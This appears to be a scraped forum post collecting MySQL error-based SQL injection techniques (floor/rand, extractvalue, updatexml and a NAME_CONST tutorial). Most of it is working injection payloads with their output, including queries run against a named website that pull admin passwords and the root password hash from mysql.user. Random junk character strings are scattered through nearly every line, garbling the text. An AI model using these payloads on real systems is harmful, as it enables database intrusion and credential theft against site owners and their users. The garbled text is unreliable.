|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
2 i5 V+ s3 E$ z, t. E首先进行正常查询: mysql> select * from article where id = 1;+ V6 H' S0 ~! h0 e' k9 d) c
+—-+——-+———+
3 k# ~. O2 l, C5 U| id | title | content |9 Q/ H2 {8 |* m4 h! V
+—-+——-+———+/ `2 \/ {8 d q" y
| 1 | test | do it |
8 r7 \; a) ?# D- q+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
( v4 i0 G$ V2 eERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。: O4 F1 \' a; e& `7 [ O
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);# ~1 W8 Z/ j. [' H2 W
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));" {+ {+ S6 s- s; [
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue, H7 d! u6 C; ^8 A9 G% k# E# @+ F7 x
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));– A4 \1 b7 z t- v3 T. P
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
, p# e+ S0 l Z/ t
G4 S% D. a# h' s+ p再收集: 3 E. s3 M% D5 Y& K! c4 T
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) : `+ g+ `6 }( M1 Q3 G/ H
3 E. V8 s2 f* m/ e: SError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’( S2 f7 `7 K9 Q7 B
. W- a2 }9 Z A/ Ehttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)' V. _! N) R2 L! s$ h
$ M% Q8 g# j" q
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
% O. x% o: [5 w% U4 J2 o. r$ O5 }; N+ P, x$ w, F+ r/ C, k
MYSQL高版本报错注入技巧-利用NAME_CONST注入7 L! w+ B( m9 v' A& V- O$ R- ]
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
: s( p& e/ i0 Z1 }; e6 t4 f2 W. M1 q2 m" Z" f
# E* {/ S1 k( }, y% X1 n
相关信息# [3 V( E0 P1 k2 p6 Y4 ?, w
6 a- \2 k- B* }9 c5 [+ I) I- m+ l/ \NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that." l& b4 x+ H+ E1 G' O' w
' A/ ]0 G- u- w' g5 U
Code:( v9 N; H' F, I$ |2 I
NAME_CONST(DATA, VALUE)
5 A4 P& A% Q4 `) G$ j. D( E; V1 J( i1 o8 b
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.( ?5 y5 I P! M
3 R" p- H" _7 e7 H
SELECT NAME_CONST('TEST', 1)6 w$ y$ N7 S9 q/ |
6 A+ u! s1 a) I
' K& F7 M5 H4 u v7 J; x- |. O' _: L2 q& V; S4 C+ p
|---------------|
# @6 X) p& z F& e4 ^5 D| TEST |
, y6 \8 R9 s) A7 W0 D9 e$ l| |
q. w! v w! y) k|---------------|' J" _8 G* _$ Y, a& T& p% D
| 1 |
( B8 u9 z9 T O# w# q, `+ @' F| |
8 W' T5 r& e$ W }! l( l* E|---------------|9 u- n+ G& x! h5 M/ _
8 y3 J/ d- d" {+ ?
7 X3 @2 }7 E8 B$ d( p
' L8 C$ N% b, k$ M
* ?- g6 K" j% `, ]; x- B/ Ehttp://dev.mysql.com/doc/refman/5.0/en/m...name-const* r# u2 }- a+ `4 H/ t/ v \% K
Intro to MySQL Variables; l. o) A& k; k3 g( ^
; J4 P: o. V {# N2 Q/ jOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
3 U! f) v8 W# U" Y
0 s8 c' Q6 \3 Q3 B+ {: a9 dCode:2 g; ^+ f2 [3 U0 U
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
( k9 p: V8 [" z. N& @8 G1 R) t: @7 h: E6 o, \; U& U
7 _$ k, N5 K" ^& P
; V, T" F" ?5 m4 O5 ?" G# F& R0 |2 w# r
" Q* ^7 I7 d' ~1 n* @& P/ j0 r- W! ~5 b. n
Code:. L8 r8 n% ~0 n7 i! k
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
4 ~/ B& `& w* z$ v: t
9 X' D# S6 X$ B% v) i8 H) P7 B
9 Z, E( f0 c" z2 D$ N! h' ? zVAR = Your MySQL variable.
1 O- {: A# e0 n* i! M# E- i% m- j
4 U- m3 b& k" Q- _2 g7 _. xMySQL 5.1.3 Server System Variables0 E; w% `- a2 n6 `7 F( W
& {8 B4 B7 H/ B" e6 ~
Let's try it out on my site..
7 a/ ?: `7 J0 m: g" V! P, T/ L. r3 h0 n4 @' p) Y
Code:
6 Y; ]8 l! ] ^" shttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
( m. q0 q( `, m/ {: k9 e! b6 J- B* p
1 \7 T' m7 x3 PErroruplicate column name '5.0.27-community-nt'+ x2 H K) {4 k
" X0 P5 x8 A; H ?. ?8 _5 H& d6 W
) [+ A- Q; p: P2 e) s* R. C0 A1 v! @4 @. a K6 _3 o
2 c2 o* F! O) ~: k: G" v
8 u F# J9 k. b- aNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again..." V( D' g8 D2 M! B% y1 @2 X
$ J( A* Q( M- |; y
Data Extraction* t* r+ k3 C* R9 H$ x
) H6 c T* w. V7 k2 E/ Y1 `! ?8 L* LCode:. }6 O. X1 B; X- y: h! D h
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
+ `2 E& f a* w: n3 G% g$ W* ]% }. }1 @
6 [0 [3 u( j1 r+ hWe should get a duplicate column 1 error...
* ^. i0 r& l) w' w- w* \
) A, w8 Y" h. j5 Z0 V4 P/ NCode:/ A8 O& K e. q" d2 V |0 x) t
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--* f5 s5 [9 j5 r7 u5 w& [$ A
$ G+ s/ _0 N# Y/ a) v' x
Erroruplicate column name '1' H f* y+ P1 J
+ {* m# m' w& m; W, r
3 a; A0 P3 }0 L0 R) u
# ^% K1 g% {. Q& g& E: N( o" } I* t
9 |2 s( g& ]: z3 S3 a5 |
9 v. f% P% P J9 i/ X0 cNow let's get the tables out this bitch..
. [( g+ v$ [: ^/ e7 Q( B! L* j6 L$ t# Y
Code: |6 e3 q" d' l
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
& u1 c4 f c I* o. O x: Y( y( W5 O; \" t
4 s4 q, u- x8 Y" D0 d v2 nLet's see if it works here, if it does, we can go on and finish the job.
6 s; K3 B+ f$ C) ^) D0 N. f
" z' w9 M8 O6 Y J/ N& ?Code:5 c9 V8 S! J4 F: y
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
5 ]8 J% H" S' r% G% ^6 o
K3 {5 B. v, ?( n) p& I8 E1 v2 j! A' g
Erroruplicate column name 'com_admanage
- f9 O& T& e. [9 x3 o3 p% U
3 M' C$ R% b% x$ H, n! J4 _6 G+ z$ y
5 m4 `6 q& w6 a* t$ {0 s
2 h' U# w# t2 P5 F7 E
3 X' T: K1 g) ^# {6 c6 W; u6 T: Z3 D. Y/ v6 I( h# Q/ L! c
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
0 ] X5 q% |5 B% k9 W2 J0 K6 f
Let's get the columns out of the user table..0 G9 j6 B, E2 G' n6 a
$ y2 V- b- A0 s& b% l. k: t
Code:
# L/ r" U$ h1 e2 e5 r# Y+ H+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
7 v/ n, \% J' f
% B5 z/ H/ t& E) o; i: c$ L% |- t' h4 P; `
So mine looks like this, and I get the duplicate column name 'Host'.
. z2 u; B) I' l0 ]7 G& V; a8 L- j
i. |$ w2 W! i- d9 n' N" @) dCode:$ S, C* u8 E$ N3 X" u3 l
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
( E& x- c; J/ h: y3 }) e
x. B/ O4 f, p! qErroruplicate column name 'Host'
/ R& w$ q$ ?* o4 w( K) i V4 v: [ f7 B- ~; _9 m; _4 }* _0 p ]
* U& p# W0 v5 V% n" L$ w2 K
* }, L. u2 s4 @7 n3 I1 Y9 i# V4 i$ k" e& v' J: I# u
! Q' R) `+ A# S; w8 r
7 i' b5 [8 r, S% b8 P: yWoot, time to finish this bitch off.
. F2 L$ c m( _* ~+ m5 \% E
0 Z H2 |' H( V8 E7 C WCode:
5 k% ^5 X8 w' v) S+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
7 n2 T4 e0 N2 s4 b
/ ^; n e! z0 d8 x/ E, G
5 k2 C! `- R5 J' e2 lSo mine looks like this...! W3 l* y# S4 y
# M% r& t! |2 `% @, d" [' I
Code:+ D. `6 u# n% j) ]- u% d
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
( B T n- R3 `9 L4 C3 e- t' {, O" p' ~' X! _
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
1 j! U& ]) F5 i1 `! M* H u: _ ^! f7 H# h K8 v1 C
$ W; c5 Y5 y, Q) N
' ^5 [; l; v$ e; c7 W6 e6 c
( R) i% M2 Q* H( w `% T' Y3 G& ?* H" \3 ]% ^# W2 `% m! `$ D8 j V
3 g- s( e& C, d8 V d4 q5 RAnd there we have it, thanks for reading.
& B+ v- X: @/ |& M; _" [# l) Q: C1 ^5 @
|
发表于 2015-11-11 19:03:37
收藏
支持
反对